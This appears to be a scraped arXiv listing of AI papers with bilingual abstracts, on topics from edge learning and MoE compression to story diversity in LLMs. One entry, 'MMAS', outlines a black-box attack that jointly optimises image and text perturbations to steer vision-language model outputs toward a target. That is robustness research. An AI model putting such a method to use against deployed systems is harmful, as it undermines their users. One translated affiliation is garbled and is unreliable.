Large-batch Contrastive Learning (CL), the foundation of modern representation learning, is fundamentally incompatible with the volatile resource constraints of edge devices. This conflict creates a dilemma: small on-device batches degrade model fidelity, while offloading to the cloud incurs unacceptable latency and bandwidth costs. Existing solutions often resort to static model compression, which fails to adapt to the runtime volatility of edge environments. To bridge this gap, we present StreamSplit, a novel framework that makes streaming CL practical across heterogeneous ARM client platforms. StreamSplit resolves the conflict between the continuous nature of ambient audio and the discrete batch requirements of models like CLAP and COLA. We introduce: (1) A distribution-based streaming framework that decouples representation quality from local batch size, using a tractable Hybrid Loss to maintain fidelity despite sparse updates; and (2) An Uncertainty-Guided Adaptive Splitter that uses a lightweight Reinforcement Learning (RL) policy to dynamically partition computation. Uniquely, this policy integrates real-time resource monitoring with embedding ambiguity to optimize the accuracy-latency trade-off on the fly. We evaluate StreamSplit on diverse hardware, from the resource-constrained Raspberry Pi 4 to the high-performance Apple M2. Results demonstrate that StreamSplit reduces per-sample latency by up to 4.7x and cuts bandwidth by 77.1% and energy by 52.3% compared to server-centric baselines. Crucially, it maintains accuracy within 2.2% of server-centric models, proving that adaptive, distributed learning is a viable path for the modern edge ecosystem.

2605.26520 2026-05-27 cs.CV cs.AI 版本更新

InterSketch: An Interleaved Reasoning Model with Self-correcting Visual Sketch and Stepwise Reward

InterSketch: 一种具有自校正视觉草图和逐步奖励的交错推理模型

Zhiwei Ning, Wenwen Tong, Xiangli Kong, Shengnan Ma, Ziyi Shang, Jingcheng Ni, Tao Hu, Yong Xien Chng, Jixuan Ying, Zehuan Wu, Hanming Deng, Jie Yang, Yuanjie Zheng, Wei Liu, Lewei Lu

发表机构 * Shanghai Jiao Tong University(上海交通大学) SenseTime Research(商汤研究院) Shandong Normal University(山东师范大学)

AI总结 针对视觉-语言模型在长程视觉推理中文本中心范式局限性的问题,提出InterSketch模型,通过自校正和逐步奖励机制增强交错视觉-文本思维链能力,在视觉推理基准上超越Gemini-3-Pro等专有模型。

详情
AI中文摘要

尽管视觉-语言模型(VLM)已展现出多轮视觉推理能力,但其推理轨迹仍相对浅层且以文本为中心,限制了其在复杂视觉挑战中的适用性。相比之下,人类思维通常涉及长程推理,并伴有交错的视觉-文本思维链(VT-CoT)。为弥合这一差距,我们引入InterSketch,一种交错推理模型,通过自校正和逐步奖励机制增强VT-CoT能力。InterSketch使用外部工具动态生成中间视觉草图,并将其与文本推理交错进行,从而在长程视觉理解任务中实现有效的感知和逻辑推理。具体而言,在第一个冷启动阶段,我们提出了一个合成的高质量交错VT-CoT数据集,并引入反思机制,使模型具备多轮交错推理和自校正能力。在后续的强化学习(RL)阶段,我们设计了一种逐步奖励机制,以缓解长程推理中仅端到端监督固有的奖励信号稀疏性问题。在视觉推理基准上的大量实验证明了InterSketch的有效性,其性能甚至超越了Gemini-3-Pro等专有模型。

英文摘要

While vision-language models (VLMs) have exhibited multi-turn visual reasoning capabilities, their reasoning trajectories remain relatively shallow and are dominated by a text-centric paradigm, limiting their applicability to complex visual challenges. In contrast, human-like thought typically involves long-horizon reasoning with an interleaved visual-textual chain-of-thought (VT-CoT). To bridge this gap, we introduce InterSketch, an interleaved reasoning model to enhance the VT-CoT capability via self-correcting and stepwise reward mechanisms. InterSketch dynamically generates intermediate visual sketches using external tools and interleaves them with textual reasoning, enabling effective perception and logical reasoning over long-horizon visual understanding tasks. Specifically, in the first cold-start stage, we propose a synthesized high-quality interleaved VT-CoT dataset and include a reflection mechanism to enable the model's capability in multi-turn interleaved reasoning and self-correction. In the subsequent reinforcement learning (RL) stage, we design a stepwise reward mechanism to mitigate the sparsity of reward signals inherent in end-only supervision over long-horizon reasoning. Extensive experiments on visual reasoning benchmarks demonstrate the effectiveness of InterSketch, even outperforming proprietary models such as Gemini-3-Pro.

2605.26514 2026-05-27 cs.CV cs.AI cs.LG 版本更新

CSV-ViT: A Vision Transformer with the Variable-sized Cortical Supervertices for Detection of Alzheimer's Disease Pathologies

CSV-ViT: 一种使用可变大小皮层超顶点的视觉Transformer用于阿尔茨海默病病理检测

Geonwoo Baek, Ikbeom Jang

发表机构 * Department of Computer Science and Engineering(计算机科学与工程系) Hankuk University of Foreign Studies(韩国家 foreign 学院)

AI总结 提出一种保留感兴趣区域的、基于顶点的可变大小皮层表面分块方法(皮层超顶点),并设计可变大小补丁兼容的视觉Transformer(CSV-ViT),在阿尔茨海默病诊断、淀粉样蛋白阳性和tau蛋白阳性三分类任务中优于现有表面模型。

详情
AI中文摘要

确认阿尔茨海默病(AD)通常依赖于正电子发射断层扫描(PET),该方法仍然昂贵且有创,这促使了基于结构MRI的预筛查的使用。在非欧几里得流形,特别是大脑皮层表面上的深度学习,由于数据的球形拓扑结构面临重大挑战。最近的表面模型已经能够从皮层表面数据中学习;然而,施加基于面的均匀补丁通常会导致补丁边界处的重复顶点。一般来说,许多基于表面的模型对感兴趣区域(ROI)的感知有限,这可能导致非皮层区域(如内侧壁)被包含在内。我们提出了一种皮层表面分块方法,该方法执行保留ROI的、基于顶点的、可变大小的补丁划分。我们将这些皮层表面补丁称为皮层超顶点(CSV)。基于这种表示,我们设计了CSV视觉Transformer(CSV-ViT),这是一种可变大小补丁容忍的视觉Transformer,使用填充和掩码感知的补丁嵌入。我们使用T1加权MRI,并通过将AD相关状态分类为三个类别来评估我们的框架:AD诊断、淀粉样蛋白阳性和tau蛋白阳性。在实验中,CSV-ViT取得了比最近基于表面的模型更高的分类性能。结果表明,所提出的CSV-ViT可能支持在PET或脑脊液确认之前基于MRI的AD相关状态预测。

英文摘要

Confirming Alzheimer's disease (AD) typically relies on positron emission tomography (PET), which remains costly and invasive, motivating the use of structural MRI-based prescreening. Deep learning on non-Euclidean manifolds, particularly brain cortical surfaces, faces significant challenges due to the data's spherical topology. Recent surface models have enabled learning from cortical surface data; however, imposing face-based uniform patches often causes duplicate vertices at patch boundaries. In general, many surface-based models are limited in their awareness of the region of interest (ROI), which can result in non-cortical regions, such as the medial wall, being included. We propose a cortical surface tokenization that performs ROI-preserving, vertex-based, variable-sized patch partitioning. We refer to these cortical surface patches as cortical supervertices (CSVs). Building on this representation, we design the CSV Vision Transformer (CSV-ViT), a variable-size patch-tolerant Vision Transformer that uses padding and a mask-aware patch embedding. We used T1-weighted MRI and evaluated our framework by classifying AD-related status into three categories: AD diagnosis, amyloid positivity, and tau positivity. Across the experiments, CSV-ViT achieved higher classification performance than recent surface-based models. The results suggest that the proposed CSV-ViT may support MRI-based prediction of AD-related status prior to PET or CSF confirmation.

2605.26508 2026-05-27 q-fin.RM cs.AI 版本更新

Foundations of a Time-Consistent Counterfactual Actuarial Runtime for Autonomous AI Agents

自主AI智能体时间一致性反事实精算运行时的基础

Hao-Hsuan Chen

发表机构 * Department of Risk Management and Insurance(风险管理与保险系)

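AI summary: Proposes an actuarial runtime layer that assigns each action a time-consistent counterfactual risk toll and establishes within-boundary no-arbitrage and budget guarantees, providing a foundational mathematical framework for autonomous AI agents.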

Comments 10 pages. Foundational paper of a multi-paper program on actuarial runtime for autonomous AI agents; previously posted on SSRN (id 6761960). Empirical companion: arXiv:2605.25632. Proof companions included as ancillary files

详情
AI中文摘要

我们为自主AI智能体提出一个基础的精算运行时层,其中每个带有副作用的动作都承担一个时间一致的反事实风险费用,该费用根据合同固定的安全默认值计算,并位于明确的承保边界内。该框架将每个动作的保险作为主要分析单元,并用动作前交易层取代事后年度责任保险。本文建立了四个结构性结果:(i) 在选定的安全默认映射和延续策略下,定义明确的反事实费用,具有显式的非唯一性;(ii) 承保边界内的无分割性质,将路径分解的动作映射为边界势能,并推论出博弈抵抗与边界设计的关系;(iii) 不可逆权威溢价,分为严格正的动作级部分和集合级稳健资本增加的充要特征;(iv) 保守运行时门控定理,将高概率费用包络转化为执行动作预算保证。该结果是更广泛项目的数学基础层:一个实证配套通过精算动作接口和权威前沿实验实例化运行时;一个机制设计配套研究战略操作者激励和跨边界聚合;一个动态承保配套研究经验评级和审计重放校准。本文陈述了原始合约、费用恒等式、边界内无套利结果以及后续层所依赖的预算保证。

英文摘要

We propose a foundational runtime actuarial layer for autonomous AI agents in which every side-effect-bearing action carries a time-consistent, counterfactual risk toll computed against a contractually fixed safe default, inside an explicit underwriting boundary. The framework treats per-action insurance as the primary unit of analysis and replaces post-hoc annual liability cover with a pre-action transaction layer. The paper establishes four structural results: (i) a well-defined counterfactual toll under a chosen safe-default mapping and continuation policy, with explicit non-uniqueness; (ii) a no-splitting property within an underwriting boundary that telescopes path-decomposed actions into a boundary potential, with a corollary tying gaming-resistance to boundary design; (iii) an irreversible-authority premium, split into a strictly positive action-level component and an if-and-only-if characterisation of the set-level robust capital increase; and (iv) a conservative runtime gating theorem that translates high-probability toll envelopes into an executed-action budget guarantee. The result is the mathematical base layer for a broader program: an empirical companion instantiates the runtime through an Actuarial Action Interface and authority-frontier experiments; a mechanism-design companion studies strategic operator incentives and cross-boundary aggregation; and a dynamic-underwriting companion studies experience rating and audit-replay calibration. The present paper states the primitive contract, the toll identity, the within-boundary no-arbitrage result, and the budget guarantee on which those later layers depend.
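Two of the structural results can be illustrated with a toy sketch. The abstract does not state the paper's definitions, so everything here is an assumption: tolls are modeled as differences of a hypothetical boundary potential `phi` (which is what makes a split path telescope), and the gate admits an action only while the sum of upper toll envelopes stays within a fixed budget.

```python
def potential_toll(phi, path):
    """Total toll of a path-decomposed action when each step is charged
    the change in a boundary potential phi (hypothetical toll form)."""
    return sum(phi(b) - phi(a) for a, b in zip(path, path[1:]))

def gate(actions, budget):
    """Conservative gate: admit an action only if its upper toll envelope
    still fits in the remaining budget.

    actions: list of (name, toll_upper_bound) pairs
    """
    spent, executed = 0, []
    for name, toll_upper in actions:
        if spent + toll_upper <= budget:
            executed.append(name)
            spent += toll_upper
    return executed, spent
```

Under this toy model, splitting an action into smaller steps does not change the total charge, because the intermediate potentials cancel; and the spent total never exceeds the budget, provided each true toll is below its envelope.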

2605.26501 2026-05-27 cs.CV cs.AI 版本更新

Unveiling the Fragility of Vision-Language Models: Multi-Modal Adversarial Synergy via Texture-Constrained Perturbations and Cross-Modal Optimization

揭示视觉-语言模型的脆弱性:通过纹理约束扰动和跨模态优化的多模态对抗协同

Xiang Fang, Wanlong Fang, Changshuo Wang

发表机构 * School of Software Engineering, Huazhong University of Science and Technology(华中科技大学软件学院) Nanyang Technological University, Singapore(新加坡南洋理工大学) University College London(伦敦大学学院)

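AI summary: Proposes a multi-modal adversarial synergy framework that jointly optimizes a texture-constrained universal adversarial perturbation and a learnable text prompt perturbation in the black-box setting, revealing the fragility of vision-language models under multi-modal attacks.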

Comments Published in AAAI 2026

详情
AI中文摘要

大型视觉-语言模型(LVLMs)通过整合视觉和文本输入,在图像描述和视觉问答等任务中表现出色,改变了多模态理解。然而,它们对抗攻击的鲁棒性,特别是利用两种模态的攻击,仍未被充分探索,这给自动驾驶和内容审核等关键应用带来了风险。现有攻击集中于单一模态或需要不切实际的白盒访问,限制了其现实相关性。在本文中,我们引入了多模态对抗协同(MMAS),这是一个开创性的框架,用于针对LVLMs构建通用的黑盒多模态攻击。MMAS同时生成纹理尺度约束的通用对抗扰动用于图像,以及可学习的提示扰动用于文本,仅通过模型查询进行联合优化。图像扰动利用基于小波的纹理约束确保在各种视觉输入中的不可感知性和鲁棒性。文本扰动在嵌入空间中受L范数约束,在保持语义连贯性的同时将输出导向目标。一种新颖的跨模态正则化项对齐扰动的梯度方向,增强了它们在任务和模型间的协同影响和可迁移性。大量实验表明,我们提出的攻击在主流LVLMs上具有强大的通用对抗能力。

英文摘要

Large Vision-Language Models (LVLMs) have transformed multi-modal understanding, excelling in tasks like image captioning and visual question answering by integrating visual and textual inputs. However, their robustness against adversarial attacks, particularly those exploiting both modalities, remains underexplored, posing risks to critical applications like autonomous driving and content moderation. Existing attacks focus on single modalities or require impractical white-box access, limiting their real-world relevance. In this paper, we introduce Multi-Modal Adversarial Synergy (MMAS), a groundbreaking framework that crafts universal, black-box multi-modal attacks against LVLMs. MMAS simultaneously generates a texture scale-constrained universal adversarial perturbation for images and a learnable prompt perturbation for text, optimized jointly using only model queries. The image perturbation leverages wavelet-based texture constraints to ensure imperceptibility and robustness across diverse visual inputs. The text perturbation, constrained by an L-norm in the embedding space, maintains semantic coherence while steering outputs toward a target. A novel cross-modal regularization term aligns the perturbations' gradient directions, enhancing their synergistic impact and transferability across tasks and models. Extensive experiments show the strong universal adversarial capabilities of our proposed attack with prevalent LVLMs.

2605.26496 2026-05-27 cs.LG cs.AI 版本更新

Dense2MoE: Pushing the Pareto Frontier of On-Device LLMs via Unified Pruning and Upcycling

Dense2MoE:通过统一剪枝和升级推动设备端LLM的帕累托前沿

Fengfa Li, Hongjin Ji, Yifeng Ding, Lei Ren, Chen Wei

发表机构 * Li Auto The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳))

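AI summary: Proposes the Dense2MoE framework, which unifies pruning and upcycling through Layer-Fusion UpCycling (LF-UC) to efficiently convert dense LLMs into on-device MoE models, achieving a better Pareto frontier between inference latency and accuracy.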

Comments 19 pages

详情
AI中文摘要

混合专家(MoE)架构对于资源受限的设备端部署极具前景,但从头训练这些模型成本高昂。当前方法试图通过将密集模型升级为MoE来缓解这一问题,然而它们常常引入参数冗余,降低推理效率。另一方面,标准层剪枝减少了冗余,但不可避免地损害模型准确性。为解决这一困境,我们提出Dense2MoE,一种通过层融合升级(LF-UC)统一剪枝和升级的新框架。在硬件Roofline理论指导下,Dense2MoE通过剪枝来自冗余层的带宽密集型注意力模块,同时将其多层感知机(MLP)重新用作MoE专家,系统地克服了推理内存墙。这种结构创新保留了模型的核心能力,并通过选择性令牌路由严格限制活跃参数。借助适度的持续预训练预算,Dense2MoE高效地将公开可用的密集LLM转换为设备端就绪的MoE模型。大量实验表明,Dense2MoE显著推进了设备端推理延迟与模型准确性的帕累托前沿,优于密集基线、最先进的压缩方法和标准升级方法。

英文摘要

The Mixture-of-Experts (MoE) architecture is highly promising for resource-constrained on-device deployments, yet training these models from scratch incurs prohibitive costs. Current methods attempt to alleviate this by upcycling dense models into MoEs; however, they often introduce parameter redundancy that degrades inference efficiency. Alternatively, standard layer pruning mitigates redundancy but inevitably compromises model accuracy. To resolve this dilemma, we propose Dense2MoE, a novel framework that unifies pruning and upcycling through Layer-Fusion UpCycling (LF-UC). Guided by hardware Roofline theory, Dense2MoE systematically overcomes the inference memory wall by pruning bandwidth-heavy attention modules from redundant layers while repurposing their Multi-Layer Perceptrons (MLPs) into MoE experts. This structural innovation preserves the model's core capabilities and strictly limits active parameters via selective token routing. With a modest continual pre-training budget, Dense2MoE efficiently converts publicly available dense LLMs into on-device-ready MoE models. Extensive experiments demonstrate that Dense2MoE significantly advances the Pareto frontier for on-device inference latency versus model accuracy, outperforming dense baselines, state-of-the-art compression, and standard upcycling methods.
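How selective token routing limits active parameters can be shown with a generic top-k router. This is a standard MoE routing sketch, not the Dense2MoE router, which the abstract does not specify; the names `top_k_route` and `moe_forward`, and the use of plain matrices as stand-ins for MLP experts, are assumptions.

```python
import numpy as np

def top_k_route(router_logits, k):
    """Per token, return the indices and softmax weights of its top-k experts."""
    idx = np.argsort(router_logits, axis=-1)[:, -k:]           # (tokens, k)
    picked = np.take_along_axis(router_logits, idx, axis=-1)
    picked = picked - picked.max(axis=-1, keepdims=True)       # numerical stability
    w = np.exp(picked)
    return idx, w / w.sum(axis=-1, keepdims=True)

def moe_forward(x, experts, router_w, k=1):
    """x: (tokens, d); experts: list of (d, d) matrices standing in for MLPs;
    router_w: (d, n_experts) hypothetical router projection."""
    idx, w = top_k_route(x @ router_w, k)
    out = np.zeros_like(x)
    for t in range(x.shape[0]):
        for j in range(k):
            # Only k experts run for this token; the others stay inactive.
            out[t] += w[t, j] * (x[t] @ experts[idx[t, j]])
    return out, idx
```

With `k=1`, each token multiplies against exactly one expert, so the per-token compute and weight traffic scale with one expert rather than with the total expert count.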

2605.26494 2026-05-27 cs.AI cs.CL cs.LG 版本更新

The MiniMax-M2 Series: Mini Activations Unleashing Max Real-World Intelligence

MiniMax-M2系列:小激活释放最大现实智能

MiniMax: Aili Chen, Aonian Li, Baichuan Zhou, Bangwei Gong, Binyang Jiang, Boji Dan, Changqing Yu, Chao Wang, Cheng Ma, Cheng Zhong, Cheng Zhu, Chengjun Xiao, Chengyi Yang, Chengyu Du, Chenyang Zhang, Chi Zhang, Chuangyi Huang, Chunhao Zhang, Chunhui Du, Chunyu Zhao, Congchao Guo, Da Chen, Deming Ding, Dianjun Sun, Dongyu Zhang, Enhui Yang, Fei Yu, Guang Zheng, Guodong Zheng, Guohong Li, Haichao Zhu, Haigang Zhou, Haimo Zhang, Han Ding, Hao Zhang, Haohai Sun, Haolin Lyu, Haonan Lu, Haoyu Wang, Huajie Shi, Huiyang Li, Jiacheng Chen, Jian Zhang, Jiaqi Zhuang, Jiaren Cai, Jiaxin Pan, Jiayao Li, Jiayuan Song, Jichuan Zhang, Jie Wang, Jihao Gu, Jin Zhu, Jingwei Dong, Jingyang Li, Jingyu Zhang, Jingze Zhuang, Jinhao Tian, Jinli Liu, Jinyi Hu, Jun Tao, Jun Zhang, Junbin Ruan, Junhao Xu, Junjie Yan, Junteng Liu, Junxian He, Kang Xu, Ke Ji, Ke Yang, Kecheng Xiao, Keyu Duan, Keyu Li, Le Han, Letian Ruan, Li Yuan, Lianfei Yu, Liheng Feng, Lijie Mo, Lin Li, Lingye Bao, Lingyu Yang, Lingyuan Zhou, Loki, Lu Chen, Lunbin Ceng, Ming Li, Ming Zhong, Mingliang Tao, Mingyuan Chi, Mujie Lin, Nan Hu, Ningxin Chen, Peiyin Zhu, Peng Gao, Pengcheng Gao, Pengfei Li, Penglin Li, Pengyu Zhao, Qibin Ren, Qidi Xu, Qihan Ren, Qile Li, Qin Wang, Quanliang Chen, Qunhong Ceng, Rong Tian, Rui Dong, Ruitao Leng, Ruize Zhang, Shanqi Liu, Shaoyu Chen, Sheng Jia, Shun Yao, Shuoran Zhao, Shuqi Yu, Sichen Li, Sicheng Pan, Songquan Zhu, Tengfei Li, Tian Xie, Tiancheng Qin, Tianrun Liang, Wei Liu, Weiqi Xu, Weitao Li, Weixiang Chen, Weiyu Cheng, Weiyu Zhang, Wenhu Chen, Wenqian Zhao, Xiancai Chen, Xiangjun Song, Xiangyuan Wang, Xiao Luo, Xiao Su, Xiaobo Li, Xiaodong Han, Xiaojie Wu, Xihao Song, Xingyi Han, Xinyu Guan, Xuan Lu, Xun Zou, Xunhao Lai, Xutong Li, Yan Gong, Yang Wang, Yang Xu, Yangsen Wang, Ye Tang, Yicheng Chen, Yinran Qiu, Yiqi Shi, Yiting Guo, Yiwen Huang, Yixuan Wang, Yongyi Hu, Yu Gao, Yu Zhang, Yuanxiang Ying, Yuanzhen Zhang, Yubo Wang, Yuchen Song, Yufeng Yang, Yuhang Meng, Yuhang Miao, Yuhao Li, Yujie Liu, Yulin Hu, Yunan Huang, Yunji Li, Yunyi Huang, Yusen Zhang, Yusu Hong, Yutao Xie, Yutong Zhang, Yuwen Liao, Yuxuan Shi, Yuze Wenren, Zebin Li, Zehan Li, Zejian Luo, Zeyu Jin, Zeyuan Sun, Zhanpeng Zhou, Zhaochen Su, Zhendong Li, Zhengmao Zhu, Zhengyuan Peng, Zhenhua Fan, Zhi Zhang, Zhichao Xu, Zhiheng Lv, Zhikang Xu, Zhitao He, Zhiwei He, Zhongyuan Li, Zibo Gao, Zijia Wu, Zijian Song, Zijian Zhou, Zijun Sun, Zishan Huang, Ziying Chen, Ziyue Ge

发表机构 * MiniMax

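AI summary: Introduces the MiniMax-M2 series of Mixture-of-Experts language models, which reach frontier-tier performance with a small number of activated parameters; core components are agent-driven data pipelines, the scalable RL system Forge, and the self-evolving M2.7 checkpoint.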

Comments Technical Report. 35 pages, 10 figures, 4 tables

详情
AI中文摘要

我们介绍了MiniMax-M2系列,这是一个基于“小激活可以释放最大现实智能”原则构建的混合专家语言模型家族。旗舰版M2总参数量为229.9B,每个token仅激活9.8B参数。M2系列专为智能体部署而端到端设计,包含三个组成部分:(i) 智能体驱动数据管道,生成大规模、可验证的轨迹,涵盖智能体编码和智能体协作,每个轨迹都基于可执行工作空间和与工件对齐的奖励;(ii) Forge,一个可扩展的智能体原生强化学习系统,适应长程智能体轨迹,并配有窗口FIFO调度、前缀树合并、推理优化以及支持白盒和黑盒智能体的干净训练-推理-智能体解耦;(iii) 最新的M2.7检查点向自我进化迈出了早期一步——自主调试训练运行并修改其自身框架。从M2到M2.7,这种组合将小激活足迹转化为智能体编码、深度搜索、办公任务和推理基准上的前沿性能。

英文摘要

We introduce the MiniMax-M2 series, a family of Mixture-of-Experts language models built around the principle that mini activations can unleash maximum real-world intelligence. The flagship M2 contains 229.9B total parameters with only 9.8B activated per token. Designed end-to-end for agentic deployment, the M2 series rests on three components: (i) agent-driven data pipelines producing large-scale, verifiable trajectories across agentic coding and agentic cowork, each grounded in an executable workspace and an artifact-aligned reward; (ii) Forge, a scalable agent-native RL system that adapts to long-horizon agent trajectories, paired with windowed-FIFO scheduling, prefix-tree merging, inference optimization, and a clean training-inference-agent decoupling that supports both white-box and black-box agents; and (iii) the latest M2.7 checkpoint, which takes an early step toward self-evolution by autonomously debugging training runs and modifying its own scaffold. Across M2 through M2.7, this combination translates a mini-activation footprint into frontier-tier performance on agentic coding, deep search, office-task, and reasoning benchmarks.
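The "mini activation" claim can be made concrete with one line of arithmetic on the two figures quoted in the abstract. The variable names are illustrative only.

```python
total_params_b = 229.9   # total parameters, in billions (from the abstract)
active_params_b = 9.8    # parameters activated per token, in billions (from the abstract)

# Fraction of the model's parameters that participate in each token's forward pass.
active_fraction = active_params_b / total_params_b
print(f"active fraction per token: {active_fraction:.2%}")
```

Roughly 4.3% of the parameters are active for any given token, which is the sense in which a 229.9B-parameter model can have the per-token compute of a much smaller dense model.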

2605.26492 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Elias in the Lighthouse, Again? Diagnosing Low Diversity in LLM Stories

灯塔中的伊莱亚斯,再次?诊断LLM故事中的低多样性

Sil Hamilton, David Mimno

发表机构 * Department of Information Science(信息科学系)

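AI summary: By sampling 20,000 stories, the study finds highly repetitive vocabulary in LLM-generated stories (e.g., Elias, lighthouses); these words trace to preference data rather than pre-training data, suggesting that small datasets combined with powerful alignment algorithms can have a disproportionate effect on diversity.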

详情
AI中文摘要

LLM生成的故事是一个流行的用例,但它们显示出非常低的变异性。我们使用五个提示从四个当前模型中采样了总共20,000个故事。我们发现,88.3%的生成故事中出现11个单词,模型之间差异很小。这些单词包括名字(Elias, Mara, Elara)、场景(灯塔)和职业(钟表匠、图书管理员)。这些标记在已发表的文献或预训练数据中并不常见,但在所有当前模型可能使用的偏好数据中却存在。令人惊讶的是,与平均后训练故事相比,这些“灯塔”故事并不常见,后训练故事中很多包含受版权保护的角色或成人内容。这一结果证明了小数据集与强大对齐算法结合可能产生的潜在不成比例影响。

英文摘要

LLM-generated stories are a popular use case, but they show very low variability. We sample 20,000 total stories from four current models using five prompts. We find that 11 words occur in 88.3% of generated stories, with little difference between models. These words include names (Elias, Mara, Elara), settings (lighthouses), and professions (clockmaker, librarian). These tokens do not often occur in published literature nor pre-training data, but they are found in preference data that is likely to have been used by all current models. Surprisingly, these "lighthouse" stories are infrequent when compared with the average post-training story, much of which contains references to copyrighted characters or adult content. This result demonstrates the potentially disproportionate impact of small datasets combined with powerful alignment algorithms.
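A coverage statistic of this kind can be computed with a short sketch. Two assumptions are made here: the statistic is read as "the share of stories containing at least one marker word", and the marker set holds only the six words the abstract names, since the full list of 11 is not given. The crude plural handling (dropping a trailing "s") is also an illustrative choice.

```python
import re

# Partial marker list: only the words named in the abstract.
MARKERS = {"elias", "mara", "elara", "lighthouse", "clockmaker", "librarian"}

def marker_coverage(stories, markers=MARKERS):
    """Fraction of stories that contain at least one marker word."""
    hits = 0
    for story in stories:
        tokens = set(re.findall(r"[a-z]+", story.lower()))
        # Also match simple plurals such as "lighthouses".
        tokens |= {t[:-1] for t in tokens if t.endswith("s")}
        if tokens & markers:
            hits += 1
    return hits / len(stories)
```

Running the same function over a corpus of published fiction and over model outputs would give the kind of comparison the abstract describes, under the stated reading of the statistic.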

2605.26478 2026-05-27 cs.RO cs.AI cs.CV cs.LG cs.SY eess.SY 版本更新

Efficient On-policy Visual-RL via Stochastic Decoupled Policy Gradient

基于随机解耦策略梯度的高效在策略视觉强化学习

Haoxiang You, Yilang Liu, Davis Zong, Qian Wang, Teeratham Vitchutripop, Qi Wang, Daniel Rakita, Ian Abraham

发表机构 * Yale University(耶鲁大学) Shanghai Jiao Tong University(上海交通大学) University of Sydney(悉尼大学)

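AI summary: Proposes the stochastic decoupled policy gradient (SDPG), which estimates policy gradients via random perturbations of trajectory rollouts and trains diverse visuomotor control policies end-to-end within a few hours on a single GPU, substantially reducing compute and memory overhead and outperforming baselines on visual MuJoCo benchmarks.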

详情
AI中文摘要

我们提出了随机解耦策略梯度(SDPG),一种轻量级的视觉强化学习方法,能够在单个NVIDIA RTX 4080 GPU上在数小时内端到端训练多样化的视觉运动控制策略。SDPG通过轨迹滚动的随机扰动估计策略梯度,所需批量渲染环境数量减少几个数量级,并显著降低计算和内存开销。在视觉MuJoCo基准测试中,SDPG在训练时间、内存使用和奖励方面始终优于基线方法。最后,为支持未来研究,我们引入了一套涵盖灵巧操作、具有挑战性的运动控制的逼真视觉机器人基准测试,并在物理硬件上展示了有效的仿真到现实迁移。

英文摘要

We present the stochastic decoupled policy gradient (SDPG), a lightweight visual reinforcement learning (RL) method that trains diverse visuomotor control policies end-to-end within a few hours on a single NVIDIA RTX 4080 GPU. SDPG estimates policy gradients via random perturbations of trajectory rollouts, requiring orders of magnitude fewer batch-rendered environments and substantially reducing compute and memory overhead. On visual MuJoCo benchmarks, SDPG consistently outperforms baseline methods in training time, memory usage, and rewards. Finally, to support future research, we introduce a suite of realistic visual robotics benchmarks spanning dexterous manipulation and challenging locomotion, and demonstrate effective sim-to-real transfer on physical hardware.

2605.26475 2026-05-27 cs.CV cs.AI 版本更新

Comparative Study of Vision-Based Metric Measurement for Large-Scale Planar Scenes

大规模平面场景的视觉度量测量比较研究

ZhiXin Sun

发表机构 * PowerChina Zhongnan Engineering Corporation Limited(中国电建集团中南勘测设计研究院有限公司)

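AI summary: For large-scale outdoor scenes, compares three vision-based planar metric measurement methods using PTZ cameras (monocular ranging, image stitching, and stereo ranging) and analyzes their accuracy and applicability.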

详情
AI中文摘要

基于视觉的度量距离和面积测量在大规模室外环境中仍然具有挑战性,原因包括远距离感知、相机变焦和不稳定的成像条件。本文研究了在实际水库监测场景中使用PTZ相机的平面度量测量,并比较了三种代表性方法:基于几何的单目测距、带有鸟瞰变换的图像拼接以及使用两个联合校准的单目相机的立体测距。对于单目测距,从相机几何推导出平面定位模型,并分析了相机俯仰角的影响。研究了用于大面积映射的图像拼接,同时开发了一种无需专用立体硬件的立体方案用于远距离测量。实验显示了明确的权衡:单目测距在足够大的俯仰角下达到米级精度,立体测距达到分米级精度且对俯仰变化敏感性较低,图像拼接在小规模场景中有效,但随着场景增大稳定性和可扩展性下降。

英文摘要

Vision-based metric distance and area measurement remains challenging in large-scale outdoor environments due to long-range sensing, camera zoom, and unstable imaging conditions. This work studies planar metric measurement in a real-world reservoir monitoring scenario using PTZ cameras and compares three representative approaches: geometry-based monocular ranging, image stitching with bird's-eye-view transformation, and stereo-based ranging using two jointly calibrated monocular cameras. For monocular ranging, planar localization models are derived from camera geometry and the effect of camera pitch angle is analyzed. Image stitching is investigated for large-area mapping, while a stereo-based scheme is developed for long-range measurement without dedicated stereo hardware. Experiments show clear trade-offs: monocular ranging achieves meter-level accuracy under sufficiently large pitch angles, stereo-based ranging achieves decimeter-level accuracy with reduced sensitivity to pitch variations, and image stitching is effective for small-scale scenes but degrades in stability and scalability as scene size increases.
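Why monocular ranging depends so strongly on pitch can be seen from the simplest flat-ground model. This is a textbook sketch, not the paper's planar localization model: it assumes a camera at known height above a level plane, with the pitch angle measured downward from the horizontal to the target ray, so that the ground distance is D = H / tan(pitch).

```python
import math

def ground_distance(height_m, pitch_deg):
    """Ground distance to a point on a level plane seen at the given
    downward pitch angle (assumed flat-ground model)."""
    return height_m / math.tan(math.radians(pitch_deg))

def distance_error(height_m, pitch_deg, pitch_err_deg):
    """Change in estimated distance caused by a small pitch error."""
    biased = ground_distance(height_m, pitch_deg - pitch_err_deg)
    return abs(biased - ground_distance(height_m, pitch_deg))
```

For a fixed pitch error, `distance_error` grows rapidly as the pitch approaches the horizon, because the derivative of H / tan(pitch) scales with 1 / sin²(pitch). Under this model, that is consistent with the abstract's observation that monocular accuracy requires sufficiently large pitch angles.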

2605.26468 2026-05-27 cs.LG cs.AI 版本更新

Diffuse to Detect: Generative Diffusion Models for Unsupervised IC Anomaly Detection

扩散检测:用于无监督IC异常检测的生成扩散模型

Yuxuan Yin, Chen He, Todd Jacobs, Jialei He, Boxun Xu, Robert Jin, Peng Li

发表机构 * Department of Electrical and Computer Engineering, University of California Santa Barbara, CA, USA(加州大学圣芭芭拉分校电子与计算机工程系)

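AI summary: Proposes the first unsupervised anomaly detection framework incorporating a Diffusion Transformer, using autoencoder compression, structured token sequences, and noise-prediction error for fast wafer-scale screening, and achieving state-of-the-art performance on 16nm IC test data.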

Comments 9 pages, 5 figures

详情
AI中文摘要

潜在缺陷筛选面临极低故障率、高维测试数据和缺乏标注异常的挑战。我们提出了首个结合扩散Transformer的无监督异常检测框架。原始测试测量值首先由自编码器压缩,然后重塑为结构化令牌序列,并加入正弦和每设备晶圆位置嵌入。异常分数来自中程扩散时间步上的噪声预测误差,从而无需任何标注缺陷或手动特征工程即可实现快速晶圆级筛选。我们的方法在极端类别不平衡下的工业16nm IC测试数据上达到了最先进的性能,并通过潜在空间重建残差提供可解释的故障定位。

英文摘要

